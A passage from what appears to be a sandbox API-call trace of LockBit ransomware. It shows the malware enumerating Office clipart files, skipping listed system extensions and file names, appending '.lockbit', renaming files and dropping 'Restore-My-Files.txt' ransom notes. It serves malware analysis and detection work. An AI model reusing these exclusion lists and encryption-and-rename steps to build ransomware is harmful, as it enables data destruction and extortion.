(FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.407] malloc (_Size=0x40068) returned 0x3f70048 [0176.407] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=4232) returned 1 [0176.407] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.407] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0176.408] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.408] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0176.408] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0176.541] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01805_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01805_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.541] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.541] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0176.541] free (_Block=0x1fa2ed8) [0176.542] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01805_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.542] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.542] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.542] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32d8d00, ftCreationTime.dwHighDateTime=0x1bd4af8, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe32d8d00, ftLastWriteTime.dwHighDateTime=0x1bd4af8, nFileSizeHigh=0x0, nFileSizeLow=0x578, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01905_.WMF", cAlternateFileName="")) returned 1 [0176.542] lstrcmpiW (lpString1=".", lpString2="SO01905_.WMF") returned -1 [0176.542] lstrcmpiW (lpString1="..", lpString2="SO01905_.WMF") returned -1 [0176.542] PathFindExtensionW (pszPath="SO01905_.WMF") returned=".WMF" [0176.542] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.542] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.543] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.543] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01905_.WMF") returned -1 [0176.543] lstrcmpiW (lpString1="ntldr", lpString2="SO01905_.WMF") returned -1 [0176.543] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01905_.WMF") returned -1 [0176.543] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01905_.WMF") returned -1 [0176.543] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01905_.WMF") returned -1 [0176.543] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01905_.WMF") returned 1 [0176.543] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01905_.WMF") returned -1 [0176.543] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.544] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01905_.WMF") returned=".WMF" [0176.544] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.544] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.544] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.544] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01905_.WMF.lockbit") returned 72 [0176.544] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01905_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01905_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0176.547] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.548] malloc (_Size=0x40068) returned 0x3df0008 [0176.548] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1400) returned 1 [0176.548] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.548] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0176.548] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.549] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0176.549] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0176.550] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01905_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01905_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.550] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.550] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.551] free (_Block=0x1fa2ed8) [0176.551] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01905_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.551] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.551] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.551] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3086, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01954_.WMF", cAlternateFileName="")) returned 1 [0176.551] lstrcmpiW (lpString1=".", lpString2="SO01954_.WMF") returned -1 [0176.552] lstrcmpiW (lpString1="..", lpString2="SO01954_.WMF") returned -1 [0176.552] PathFindExtensionW (pszPath="SO01954_.WMF") returned=".WMF" [0176.552] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.552] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.553] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01954_.WMF") returned -1 [0176.553] lstrcmpiW (lpString1="ntldr", lpString2="SO01954_.WMF") returned -1 [0176.553] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01954_.WMF") returned -1 [0176.553] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01954_.WMF") returned -1 [0176.553] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01954_.WMF") returned -1 [0176.553] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01954_.WMF") returned 1 [0176.553] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01954_.WMF") returned -1 [0176.553] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.553] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01954_.WMF") returned=".WMF" [0176.553] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.553] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.554] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.554] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.554] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01954_.WMF.lockbit") returned 72 [0176.554] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01954_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01954_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0176.556] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.556] malloc (_Size=0x40068) returned 0x1ff1e60 [0176.556] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12422) returned 1 [0176.556] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.556] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0176.556] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.557] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0176.557] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.558] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01954_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01954_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.558] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.558] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.559] free (_Block=0x1fa2ed8) [0176.559] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01954_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.559] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.559] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.559] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1d14, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02009_.WMF", cAlternateFileName="")) returned 1 [0176.559] lstrcmpiW (lpString1=".", lpString2="SO02009_.WMF") returned -1 [0176.559] lstrcmpiW (lpString1="..", lpString2="SO02009_.WMF") returned -1 [0176.559] PathFindExtensionW (pszPath="SO02009_.WMF") returned=".WMF" [0176.560] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.560] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.560] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.561] lstrcmpiW (lpString1=".idx", 